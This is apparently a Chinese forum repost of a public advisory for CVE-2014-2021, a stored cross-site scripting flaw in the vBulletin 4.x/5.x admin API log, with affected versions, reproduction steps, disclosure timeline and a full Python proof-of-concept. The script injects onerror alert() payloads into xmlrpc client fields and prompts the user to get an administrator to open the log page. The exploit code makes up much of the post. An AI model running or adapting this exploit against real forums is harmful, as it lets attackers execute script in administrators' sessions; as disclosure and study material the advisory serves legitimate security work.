请选择 进入手机版 | 继续访问电脑版
查看: 1787|回复: 0

vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Aut...

[复制链接]
  • TA的每日心情

    前天 18:44
  • 签到天数: 927 天

    [LV.10]以坛为家III

    发表于 2016-7-19 13:41:03 | 显示全部楼层 |阅读模式
    [Python] 纯文本查看 复制代码
    CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)
    ================================================================================================
      
    Overview
    --------
      
        date    :  10/12/2014
        cvss    :  4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
        cwe     :  79
          
        vendor  : vBulletin Solutions
        product : vBulletin 4
        versions affected :  latest 4.x and 5.x (to date); verified <= 4.2.2  ; <= 5.0.x
                * vBulletin 5.0.5     (verified)
                * vBulletin 4.2.2     (verified)  
                * vBulletin 4.2.1     (verified)  
                * vBulletin 4.2.0 PL2 (verified)  
                      
        exploitability :
                * remotely exploitable
                * requires authentication (apikey)
                * requires non-default features to be enabled (API interface, API-Logging)
                * requires user interaction to trigger exploit (admincp - admin views logs)
                      
        patch availability (to date) :  None
      
      
    Abstract
    ---------
       
        vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name)
        allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. 
        Code is executed once an admin visits the API log page and clicks on the API clients name.
          
        risk:  rather low - due to the fact that you the api key is required
               you can probably use CVE-2014-2023 to obtain the api key
      
      
    Details
    --------
          
        vulnerable component: 
            ./admincp/apilog.php?do=viewclient
        apilog.php does not sanitize xmlrpc client provided data before passing it to
        print_label_row to generate the output page.
      
      
    Proof of Concept (PoC)
    ----------------------
      
        see [url]https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021[/url]
          
          
        1) prerequisites
        1.1) enable API, generate API-key
             logon to AdminCP
             goto "vBulletin API"->"API-Key" and enable the API interface, generate key
             goto "vBulletin API"->"API-Log" and enable all API logging
        2) run PoC
             edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
             run PoC, wait for SUCCESS! message
        3) trigger exploit
             logon to AdminCP
             goto "vBulletin API"->"API-Log" and hit "view"
             in search results click on "client name"
             the injected msgbox pops up
               
      
    Timeline
    --------
      
        2014-01-14: initial vendor contact - no reply
        2014-01-24: vendor contact - no reply
        2014-10-13: public disclosure
          
    Contact
    --------
      
        tintinweb - [url]https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021[/url]
          
          
    (0x721427D8)
      
      
    - - -
      
      
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, cookielib, urllib, json, hashlib
      
    class Exploit(object):
          
        baseurl = None
        cookies = None
          
        def __init__(self,baseurl,params, debuglevel=1):
            self.cookies = cookielib.LWPCookieJar()
            handlers = [
                        urllib2.HTTPHandler(debuglevel=debuglevel),
                        urllib2.HTTPSHandler(debuglevel=debuglevel),
                        urllib2.HTTPCookieProcessor(self.cookies)
                        ]
            self.browser = urllib2.build_opener(*handlers)
            self.baseurl=baseurl
            self.params = params
          
        def call(self,path="",data={}):
            assert(isinstance(data,dict))
            data = urllib.urlencode(data)
      
            req = urllib2.Request("%s%s"%(self.baseurl,path),data)
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
      
            return self.browser.open(req)
          
        def call_json(self,path=None,data={}):
            try:
                x=self.call(path,data).read()
                print "raw_response", x
                resp =  json.loads(x)
            except urllib2.HTTPError, he:
                resp = he.read()
            return resp
      
      
        def vb_init_api(self):
            params = {'api_m':'api_init'}
            params.update(self.params)
            data = self.call_json("?%s"%(urllib.urlencode(params)))  
            self.session = data
            return data
          
        def vb_call(self, params):
            api_sig = self._vb_build_api_sig(params)
            req_params = self._vb_build_regstring(api_sig)
            params.update(req_params)
            data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
            if not isinstance(data, dict):
                return data
            if 'errormessage' in data['response'].keys():
                raise Exception(data)
            return data
      
        def _ksort(self, d):
            ret = []
            for key, value in [(k,d[k]) for k in sorted(d.keys())]:
                ret.append( "%s=%s"%(key,value))
            return "&".join(ret)
      
        def _ksort_urlencode(self, d):
            ret = []
            for key, value in [(k,d[k]) for k in sorted(d.keys())]:
                ret.append( urllib.urlencode({key:value}))
            return "&".join(ret)
      
        def _vb_build_api_sig(self, params):
            apikey = self.params['apikey']
            login_string = self._ksort_urlencode(params)
            access_token = str(self.session['apiaccesstoken'])
            client_id = str(self.session['apiclientid'])
            secret = str(self.session['secret'])
            return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
          
        def _vb_build_regstring(self, api_sig):
            params = {
                      'api_c':self.session['apiclientid'],
                      'api_s':self.session['apiaccesstoken'],
                      'api_sig':api_sig,
                      'api_v':self.session['apiversion'],
                      }
            return params
          
      
    if __name__=="__main__":
        TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
        APIKEY = "G4YvWVhp"
        DEBUGLEVEL = 0          # 1 to enable request tracking
      
        print "vBulletin 5.x / 4.x - XSS in API"
        ### 1. XSS
        '''
        vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
                            * enable vbulletin API =       yes
                            * enable API log =             yes
          
        xss in:
            1)    http://xxxx/vb/admincp/apistats.php?do=client
            2)    click on hex<video><source/**/onerror='alert(1)'>hex
            2.1)  e.g.  http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1
          
        '''
        params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
                 'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2",
                 'platformname':"hex<video><source/**/onerror='alert(3)'>hex3",
                 'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4",
                 'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5",
                 'apikey':APIKEY} 
      
        print "[  1 ] - xss - inject alert() to admincp"
        x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
        vars = x.vb_init_api()
        print vars
          
        """
    $calls = array(
        'methods' => array(
            'login_login', 'api_init'
             ),
        'login_login' => array(
            'POST' => array(
                'vb_login_username' => 'admin',
                'vb_login_password' => 'password',
            ),
        ),
        'api_init' => array(
            'sessionhash' => '{session.dbsessionhash}'
        )
    );
          
        """
        print "[*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
          
        '''
        calls = {'methods':['api_init'],
                 'api_init':{
                             'sessionhash':vars['sessionhash']
                             }}
        '''
        # just a dummy call
        x.vb_call(params={'api_m':'api_forumlist',
                          'type':'t',
                          'x':"1"})
        print "[   *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
        print "-- quit --"
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表